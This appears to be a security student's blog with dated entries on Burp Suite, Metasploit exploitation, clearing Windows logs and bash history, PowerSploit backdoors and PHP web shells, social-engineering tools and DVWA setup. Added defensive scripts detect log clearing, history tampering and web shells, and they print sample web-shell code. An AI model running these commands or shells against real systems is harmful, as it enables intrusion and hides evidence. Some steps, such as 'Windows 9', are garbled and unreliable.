May 29

Burp Suite is an integrated platform for performing security testing of web applications: a set of tools that work together to map an application, intercept and modify its traffic, and identify and exploit vulnerabilities.

1.) Check your IP address by using ifconfig/ipconfig.

2.) In the Proxy options, activate the listener interface you want to use.

3.) Make sure intercept is on.

4.) In the browser's advanced network settings, route the request-response traffic through port 8080 of your localhost.

5.) Open any website in which you want to find vulnerabilities; the traffic arrives on the port you are listening on, and Burp Suite shows information such as cookies.

6.) The Spider tool is used to get a complete list of URLs and parameters for each site. To run the spider in Burp Suite, switch intercept off for the target.

7.) The site map aggregates all of the information that Burp has gathered about the applications.
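Step 2 chooses the interface the proxy listener binds to. A listener bound to anything other than a loopback address accepts traffic from other hosts on the network, which turns the proxy into an open relay for anyone who can reach that port. The following check is an added example, not part of the original post: it parses the LISTEN lines of `ss -ltn` output (the sample text is constructed) and reports the proxy ports that are not bound to a loopback address.

```python
import ipaddress

# Constructed sample of `ss -ltn` output (not captured from a real host).
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      50     127.0.0.1:8080      0.0.0.0:*
LISTEN 0      50     0.0.0.0:8081        0.0.0.0:*
LISTEN 0      128    [::1]:8080          [::]:*
LISTEN 0      128    *:8082              *:*
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
"""


def parse_listeners(ss_text):
    """Return (host, port) pairs for every LISTEN line of `ss -ltn` output."""
    listeners = []
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        host, port = fields[3].rsplit(":", 1)   # "Local Address:Port" column
        listeners.append((host.strip("[]"), int(port)))   # drop IPv6 brackets
    return listeners


def is_local_only(host):
    """True when the address only accepts connections from the same machine."""
    if host in ("*", ""):          # wildcard: every interface
        return False
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:             # not a literal address
        return False


def exposed_listeners(listeners, proxy_ports):
    """Proxy ports (the ones you configured in Burp) reachable from other hosts."""
    return [(host, port) for host, port in listeners
            if port in proxy_ports and not is_local_only(host)]


if __name__ == "__main__":
    for host, port in exposed_listeners(parse_listeners(SAMPLE_SS_OUTPUT), {8080, 8081, 8082}):
        print(f"WARNING: proxy listener on {host}:{port} is reachable from the network")
```

On a real machine, pipe the output of `ss -ltn` into `parse_listeners` and pass the set of ports you configured in Burp's Proxy options; anything the check prints should be rebound to 127.0.0.1 unless you deliberately want other devices to use the proxy.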

May 29

There’s a script called clearev in the Metasploit meterpreter that clears all event logs. It opens the event logs on a Windows system and wipes every log it finds, which removes our connections and attempted connections from the log files. Most administrators are not vigilant about this, but some may find the emptied logs suspicious.

To remove our history, we can use the command:

  • Simply type “clearev” in meterpreter.

We have to make certain that our command history is erased before leaving the compromised system. The bash shell we’re typing in will save our last 500 commands. A system admin could track all of our commands, detect and decipher our activities on the system, and potentially use them as evidence.

To see our history, use the more command:

  • more ~/.bash_history

The size of our file history is determined by the variable HISTSIZE. We could then set it to zero by typing:

  • export HISTSIZE=0

Now, our shell will not store any of our history! If you change the HISTSIZE to zero before beginning the hack, none of the commands will be stored.
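Both techniques in this entry leave traces a defender can look for. On Windows, clearing the Security log writes Event ID 1102 (“The audit log was cleared”) and clearing the System log writes Event ID 104, so the act of running clearev is itself recorded; on Linux, a command-auditing setup records the `export HISTSIZE=0` line before the shell stops keeping history. The script below is an added example, not part of the original post: the JSON event records and the `user=... cmd='...'` audit lines are constructed samples in a made-up shape, and the detection keys on those two event IDs and on history-disabling commands.

```python
import json
import re

# Constructed sample telemetry in a made-up JSON-lines shape (not real exports).
WINDOWS_EVENTS = """\
{"Channel": "Security", "EventID": 4624, "Computer": "WS01", "SubjectUserName": "jdoe", "Message": "An account was successfully logged on."}
{"Channel": "Security", "EventID": 1102, "Computer": "WS01", "SubjectUserName": "jdoe", "Message": "The audit log was cleared."}
{"Channel": "System", "EventID": 104, "Computer": "WS01", "SubjectUserName": "jdoe", "Message": "The System log file was cleared."}
{"Channel": "System", "EventID": 7036, "Computer": "WS01", "Message": "A service entered the running state."}
"""

# Constructed shell-audit lines, one executed command per line.
SHELL_AUDIT = """\
user=jdoe cmd='ls -la /var/log'
user=jdoe cmd='export HISTSIZE=0'
user=jdoe cmd='unset HISTFILE'
user=root cmd='history -c'
user=jdoe cmd='echo HISTSIZE is fine'
"""

# Windows writes these records when an event log is cleared; clearev triggers them.
LOG_CLEAR_EVENTS = {
    ("Security", 1102): "Security audit log cleared",
    ("System", 104): "System event log cleared",
}

# Commands that stop bash from recording, or that erase, the command history.
HISTORY_PATTERNS = [
    (re.compile(r"\bHISTSIZE=0\b"), "history size set to zero"),
    (re.compile(r"\bHISTFILESIZE=0\b"), "history file size set to zero"),
    (re.compile(r"\bunset\s+HISTFILE\b"), "history file disabled"),
    (re.compile(r"\bhistory\s+-c\b"), "in-memory history cleared"),
]
AUDIT_LINE_RE = re.compile(r"user=(\S+)\s+cmd='(.*)'")


def windows_log_clears(jsonl):
    """Return (computer, user, description) for every log-clearing event."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        key = (event.get("Channel"), event.get("EventID"))
        if key in LOG_CLEAR_EVENTS:
            findings.append((event.get("Computer"),
                             event.get("SubjectUserName", "?"),
                             LOG_CLEAR_EVENTS[key]))
    return findings


def shell_history_tampering(audit_text):
    """Return (user, command, description) for commands that disable or wipe history."""
    findings = []
    for line in audit_text.splitlines():
        match = AUDIT_LINE_RE.search(line)
        if not match:
            continue
        user, cmd = match.groups()
        for pattern, description in HISTORY_PATTERNS:
            if pattern.search(cmd):
                findings.append((user, cmd, description))
                break   # one finding per command is enough
    return findings


if __name__ == "__main__":
    for finding in windows_log_clears(WINDOWS_EVENTS) + shell_history_tampering(SHELL_AUDIT):
        print("ALERT:", finding)
```

The Windows side of the check only works if the events are forwarded somewhere the attacker cannot clear, which is the usual argument for shipping logs to a central collector rather than relying on the local event log.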

May 28

An attacker who has gained access to the target system can choose to use both the system and the resources inside it, and further use the system as a launch pad to scan and exploit other systems, or keep exploiting the current system in stealth mode.

Tools and Methods for Maintaining Access

A backdoor is a tool for getting back into a system that has already been breached. PowerShell provides access at the application level, but to gain it, the piece of malware first needs to be installed on the machine locally. PowerShell can then be used to sneak out passwords, credentials, and any other sensitive information stored on the system.

PowerSploit is a tool for Windows machines. It relies on the PowerShell already installed on the victim’s machine and helps the hacker connect to that machine via PowerShell.

1.) Open the PowerSploit folder.

2.) Download the tool onto the victim’s machine from a web server, which the PowerSploit tools allow you to create.

3.) The target directory served over the web will look like this.

4.) Start a listener that connects the terminal to the target by typing “sbd -l -p ServerIP -v”.

5.) On the server side, change the target port to match the terminal by typing “sbd ServerIP port” on the terminal, and you will be connected to the web server.

6.) Open the webshell folder by typing “cd /usr/share/webshells/” and then open the php directory.

7.) To upload the shell to a web server, for example “backdoor.php”, open the webpage at the URL of the web shell.

8.) At the end, write the cmd command. You will have all the information of the target.
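Steps 6 to 8 rely on a PHP web shell: a file in the web root that passes a request parameter straight into a command or code execution function. A defender can find such files by looking for exactly that combination. The scanner below is an added example, not code from the post or from PowerSploit; it writes a few constructed PHP files into a temporary directory (one benign, one that runs a fixed command, two that execute whatever the request supplies) and reports the files where an execution function appears together with a request superglobal.

```python
import os
import re
import tempfile

# Functions that execute code or commands, and request data that could feed them.
SINK_RE = re.compile(r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)
INPUT_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|FILES)\b")
OBFUSCATION_RE = re.compile(r"\b(base64_decode|gzinflate|str_rot13|gzuncompress)\s*\(", re.I)

# Constructed sample files for the demo web root (not from any real site).
SAMPLE_FILES = {
    "index.php": "<?php echo 'Hello ' . htmlspecialchars($_GET['name']); ?>",
    "cron.php": "<?php $out = shell_exec('df -h'); file_put_contents('/tmp/df.txt', $out); ?>",
    "uploads/backdoor.php": "<?php if (isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>",
    "uploads/img.php": "<?php eval(base64_decode($_POST['p'])); ?>",
}


def scan_source(text):
    """Classify one PHP source: clean, sink-only (runs fixed commands) or webshell."""
    sinks = sorted({m.group(1).lower() for m in SINK_RE.finditer(text)})
    inputs = sorted({m.group(1) for m in INPUT_RE.finditer(text)})
    obfuscated = bool(OBFUSCATION_RE.search(text))
    if sinks and inputs:
        verdict = "webshell"      # execution function plus attacker-controlled input
    elif sinks:
        verdict = "sink-only"     # worth a look, but no request data reaches it
    else:
        verdict = "clean"
    return {"sinks": sinks, "inputs": inputs, "obfuscated": obfuscated, "verdict": verdict}


def scan_webroot(root):
    """Walk a web root and return findings for every PHP file that is not clean."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                result = scan_source(fh.read())
            if result["verdict"] != "clean":
                findings[os.path.relpath(path, root)] = result
    return findings


def demo_webroot():
    """Materialise the constructed samples in a temp dir and scan them."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return scan_webroot(root)


if __name__ == "__main__":
    for rel, result in demo_webroot().items():
        print(f"{result['verdict']:10} {rel}  sinks={result['sinks']} inputs={result['inputs']}"
              f"{'  obfuscated' if result['obfuscated'] else ''}")
```

Point `scan_webroot` at a real document root such as /var/www/html to run it for real. The `obfuscated` flag matters because shells that decode their payload at runtime hide the request superglobal from simpler string matches; pairing a file-integrity baseline of the web root with this scan catches new or changed files that a signature alone would miss.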

May 27

Social engineering is an attack vector that relies heavily on human interaction and often involves tricking people into breaking normal security procedures. I learned that there are 7 types of social engineering attacks, and social engineering can take many forms depending on the medium used to implement the attack.

The 7 types of social engineering attacks are phishing, spear phishing, vishing, pretexting, baiting, tailgating, and quid pro quo. Among them, phishing is the most common type of social engineering attack. The attacker creates a copy of a website and sends the link through social media; the target, unaware of the attack, may end up entering their personal information on the website, such as email, password, bank account, etc.

Tools used for social engineering:

  • Social Engineering Toolkit (SET)
  • Gophish
  • SocialFish

May 25

Target exploitation is one of the steps in a penetration test. It focuses on establishing access to a system by bypassing its security restrictions. Although an exploit can be found in various ways, one of the most common methods is baiting the target into entering their information on a malicious website, after which the hacker exploits that information. Target exploitation can be done using Metasploit.

1. Make a new IP address interface
– ifconfig (interface) (IPAddress) (subnetMask)
– sudo (interface) (IPAddress) (subnetMask) | To check if the interface exists

2. Start Metasploit
– msfconsole

3. In this case, we try using Windows 9
– use exploit/windows/smb/ms09_050_smb2_negotiate_func_index

4. Read the options and the target list with the show command
– show options
– show targets

5. set LHOST (our IPAddress)

6. set RHOST (target’s IPAddress)

7. set PAYLOAD

8. exploit

The goal is to read the target information to find vulnerabilities and to serve as a Proof of Concept (PoC).
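Steps 5 and 6 set LHOST and RHOST by hand, and step 8 launches the exploit against whatever RHOST holds. The check a practitioner wants at that point is that RHOST lies inside the ranges the engagement authorises (and not in an excluded list such as the client's gateway) and that LHOST is really one of your own addresses, otherwise the handler never receives the session. The helper below is an added example, not part of the original post or of Metasploit; the CIDR ranges and local addresses are constructed.

```python
import ipaddress

# Constructed engagement scope (not from the original post).
AUTHORISED_RANGES = ["10.0.5.0/24", "192.168.56.0/24"]
EXCLUDED_HOSTS = ["10.0.5.1/32"]                      # e.g. the client's gateway, off limits
OUR_ADDRESSES = ["10.0.5.200", "192.168.56.101"]      # addresses on our attacking box


class ScopeError(ValueError):
    """Raised when a host is outside the authorised ranges or is not ours."""


def _networks(cidrs):
    return [ipaddress.ip_network(cidr, strict=False) for cidr in cidrs]


def check_rhosts(rhosts, allowed_cidrs, excluded_cidrs=()):
    """Return the targets that are in scope; raise ScopeError at the first one that is not."""
    allowed = _networks(allowed_cidrs)
    excluded = _networks(excluded_cidrs)
    approved = []
    for host in rhosts:
        addr = ipaddress.ip_address(host)   # rejects malformed input early
        if any(addr in net for net in excluded):
            raise ScopeError(f"{host} is explicitly excluded from the engagement")
        if not any(addr in net for net in allowed):
            raise ScopeError(f"{host} is outside the authorised ranges")
        approved.append(host)
    return approved


def check_lhost(lhost, local_addresses):
    """LHOST must be an address of our own machine for the reverse connection to arrive."""
    if lhost not in local_addresses:
        raise ScopeError(f"{lhost} is not one of our addresses: {local_addresses}")
    return lhost


def msf_settings(lhost, rhost, payload,
                 allowed_cidrs=AUTHORISED_RANGES, excluded_cidrs=EXCLUDED_HOSTS,
                 local_addresses=OUR_ADDRESSES):
    """Return the LHOST/RHOST/PAYLOAD values for steps 5 to 7, after both checks pass."""
    return {
        "LHOST": check_lhost(lhost, local_addresses),
        "RHOST": check_rhosts([rhost], allowed_cidrs, excluded_cidrs)[0],
        "PAYLOAD": payload,
    }


if __name__ == "__main__":
    print(msf_settings("10.0.5.200", "10.0.5.20", "windows/meterpreter/reverse_tcp"))
```

Keeping the scope in one place like this, and refusing to print the settings for an out-of-scope host, is cheap insurance against the typo in RHOST that sends an exploit to a machine nobody authorised.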

May 11

DVWA installation

1.) Download the file.

2.) unzip master.zip

3.) Move the contents of DVWA-master to the web root directory /var/www/html and change their ownership.

4.) Start apache2 and mysql, then install mysql.

5.) Create the database and give all privileges to a user.

6.) Open the config file and change the settings to match the database.

7.) Click create/reset database.
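Steps 5 and 6 are the parts most often done by hand, and they are where a lab install quietly ends up with a database user that owns every database and a password that never changed from the default. The helper below is an added example, not part of the post or of DVWA: it renders the SQL for step 5 with privileges limited to the DVWA database rather than all databases, and rewrites the `$_DVWA[ 'db_*' ]` entries that step 6 refers to. The key names follow DVWA's config.inc.php; the sample file content here is constructed.

```python
import re

# Constructed excerpt in the shape of DVWA's config/config.inc.php (not the real file).
SAMPLE_CONFIG = """\
<?php
$_DVWA = array();
$_DVWA[ 'db_server' ]   = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ]     = 'dvwa';
$_DVWA[ 'db_password' ] = 'p@ssw0rd';
$_DVWA[ 'db_port' ]     = '3306';
"""

# Matches one `$_DVWA[ 'db_xxx' ] = '...'` assignment; group 1 keeps the original spacing.
CONFIG_KEY_RE = re.compile(r"(\$_DVWA\[\s*'(db_\w+)'\s*\]\s*=\s*)'[^']*'")
IDENT_RE = re.compile(r"[A-Za-z0-9_]+")


def validate_identifier(name):
    """Database and user names go into backticks/quotes, so allow only plain identifiers."""
    if not IDENT_RE.fullmatch(name):
        raise ValueError(f"unsafe database/user name: {name!r}")
    return name


def validate_password(password):
    """Refuse the kind of password that breaks the quoting below or is trivially guessed."""
    if len(password) < 12 or any(c in password for c in "'\\"):
        raise ValueError("password must be at least 12 characters and contain no quotes or backslashes")
    return password


def render_db_sql(database, user, password, host="localhost"):
    """SQL for step 5: the user gets all privileges on the DVWA database only, not on *.*."""
    validate_identifier(database)
    validate_identifier(user)
    validate_password(password)
    return "\n".join([
        f"CREATE DATABASE IF NOT EXISTS `{database}`;",
        f"CREATE USER IF NOT EXISTS '{user}'@'{host}' IDENTIFIED BY '{password}';",
        f"GRANT ALL PRIVILEGES ON `{database}`.* TO '{user}'@'{host}';",
        "FLUSH PRIVILEGES;",
    ])


def patch_config(text, values):
    """Step 6: replace the given db_* values in the config text, keeping everything else intact."""
    present = {m.group(2) for m in CONFIG_KEY_RE.finditer(text)}
    missing = set(values) - present
    if missing:
        raise KeyError(f"keys not found in config: {sorted(missing)}")

    def replace(match):
        key = match.group(2)
        return f"{match.group(1)}'{values[key]}'" if key in values else match.group(0)

    return CONFIG_KEY_RE.sub(replace, text)


if __name__ == "__main__":
    creds = {"db_database": "dvwa", "db_user": "dvwa_user", "db_password": "Lab-Only-Passw0rd!"}
    print(render_db_sql(creds["db_database"], creds["db_user"], creds["db_password"]))
    print(patch_config(SAMPLE_CONFIG, creds))
```

Feed the rendered SQL to the mysql client and write the patched text back to config/config.inc.php. Since DVWA is deliberately vulnerable, keep `db_server` on 127.0.0.1 and the Apache listener on an isolated lab interface; the least-privilege grant limits what a successful SQL injection against DVWA can reach in the same MySQL instance.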